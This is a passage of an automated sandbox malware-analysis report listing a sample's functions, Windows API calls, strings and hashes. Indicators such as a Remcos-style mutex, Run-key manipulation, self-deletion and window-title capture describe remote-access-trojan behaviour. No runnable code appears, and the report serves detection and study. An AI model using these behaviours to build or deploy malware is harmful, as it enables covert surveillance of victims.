                                        • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                        • Instruction Fuzzy Hash: 3F01F5712082147FE6104F28AC89EBB739DEB96379F14063AF952C22C0D765CC8596BE
                                        Function 00414B9B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 163COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CountEventTick
                                        • String ID: >G
                                        • API String ID: 180926312-1296849874
                                        • Opcode ID: 4dea9cf180482d33175dd0781c2a7a7f11c81ec4a99f4dcef033a069f5296280
                                        • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                        • Opcode Fuzzy Hash: 4dea9cf180482d33175dd0781c2a7a7f11c81ec4a99f4dcef033a069f5296280
                                        • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                        Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                        • RegDeleteValueW.KERNEL32(?,?,?,pth_unenc), ref: 00412998
                                        Strings
                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteOpenValue
                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                        • API String ID: 2654517830-1051519024
                                        • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                        • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                        • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                        • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                        Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DeleteDirectoryFileRemove
                                        • String ID: pth_unenc
                                        • API String ID: 3325800564-4028850238
                                        • Opcode ID: 2e8d6704218f96b318e7a73bad0b28a6b8edcd2455483e95ffe0dafda84626ef
                                        • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                        • Opcode Fuzzy Hash: 2e8d6704218f96b318e7a73bad0b28a6b8edcd2455483e95ffe0dafda84626ef
                                        • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                        Function 0040BED7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040D9AA,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0040BEE6
                                        • GetLastError.KERNEL32 ref: 0040BEF1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateErrorLastMutex
                                        • String ID: Rmc-IUHLZ9
                                        • API String ID: 1925916568-3818685771
                                        • Opcode ID: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                        • Instruction ID: f970ec9d0541ab61c93bafde2a4f59c5c821b48a7874ab2150ad5935bc14b509
                                        • Opcode Fuzzy Hash: defc0333e3605ddb085507e8cb5f1de2847b42d11ba618549d06c615cf8541f0
                                        • Instruction Fuzzy Hash: 75D012707083009BD7181774BC8A77D3555E784703F00417AB90FD55E1CB6888409919
                                        Function 00412513 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                        • RegCloseKey.KERNEL32(?), ref: 0041255F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                                        • Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
                                        • Opcode Fuzzy Hash: 1a25bcfb25f4c61a33ed6ceb80866840e5ee7adcdacacd2e2e41860cf5e9bac8
                                        • Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
                                        Function 0041265D Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                        • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                        • RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                        • Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
                                        • Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
                                        • Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
                                        Function 004124B7 Relevance: 4.5, APIs: 3, Instructions: 38registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                        • RegCloseKey.KERNEL32(?), ref: 00412500
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                        • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                        • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                        • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
                                        Function 0041246E Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                        • RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenQueryValue
                                        • String ID:
                                        • API String ID: 3677997916-0
                                        • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                        • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                        • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                        • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                        Function 00409517 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: xAG
                                        • API String ID: 176396367-2759412365
                                        • Opcode ID: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                        • Instruction ID: 06a27fc39790a6443aa461e0e984232ee7603be4cd8470566e0b89af9a4a2a71
                                        • Opcode Fuzzy Hash: 5b2808d6a420319a8e352f948dca3b51851caf84ac7e067c3f15d365214f07ca
                                        • Instruction Fuzzy Hash: FE1163329002059FCB15FF66D8969EF77A4EF64314B10453FF842622E2EF38A955CB98
                                        Function 0041A955 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A969
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: GlobalMemoryStatus
                                        • String ID: @
                                        • API String ID: 1890195054-2766056989
                                        • Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                        • Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
                                        • Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
                                        • Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
                                        Function 0044B9CE Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 0044B9EF
                                          • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        • RtlReAllocateHeap.NTDLL(00000000,00475D50,?,00000004,00000000,?,0044E91A,00475D50,00000004,?,00475D50,?,?,00443135,00475D50,?), ref: 0044BA2B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap$_free
                                        • String ID:
                                        • API String ID: 1482568997-0
                                        • Opcode ID: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                        • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                                        • Opcode Fuzzy Hash: 5cfe77718a578226d9c79b09a3ca5d66c4b9dac56741ea3d957ce73d3817e4be
                                        • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                                        Function 004041F1 Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                          • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateEventStartupsocket
                                        • String ID:
                                        • API String ID: 1953588214-0
                                        • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                        • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                        • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                        • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                        Function 0043361D Relevance: 3.0, APIs: 2, Instructions: 38COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                                          • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,00434421,?,?,?,?,?,?,?,?,00434421,?,0046D644,0041AD85,?), ref: 00437C47
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID:
                                        • API String ID: 3476068407-0
                                        • Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                        • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                                        • Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
                                        • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                                        Function 0041AC62 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32 ref: 0041AC84
                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC97
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$ForegroundText
                                        • String ID:
                                        • API String ID: 29597999-0
                                        • Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                        • Instruction ID: cc2156d331005380bc7f387210694eb4be3f76427b44d354f8bc4e4bef854abe
                                        • Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
                                        • Instruction Fuzzy Hash: CFE04875A0031867FB24A765AD4EFD6766C9704715F0000B9BA19E21C3E9B4EA04C7E4
                                        Function 00413F9A Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                        • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                          • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                          • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                          • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                          • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                        • String ID:
                                        • API String ID: 1170566393-0
                                        • Opcode ID: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                        • Instruction ID: 6b8e1b3bf706901e9cebb32ced8ad4f2671330a9e567d97b4cc2d1cd49d6d23a
                                        • Opcode Fuzzy Hash: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                        • Instruction Fuzzy Hash: CED05B326406216FA310575D6D01FFBB5DCDFA67717110077F408D7110D6946D8283ED
                                        Function 00446B0F Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,00434413,?,?,00437237,?,?,?,?,?,0040CC87,00434413,?,?,?,?), ref: 00446B41
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.3306889380.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.3306870450.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306927450.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306952390.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.3306998043.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_17363482247f60133f013d62aae38c531ac95bb55a200a243b0e15fa7cf8e8923b2a10.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
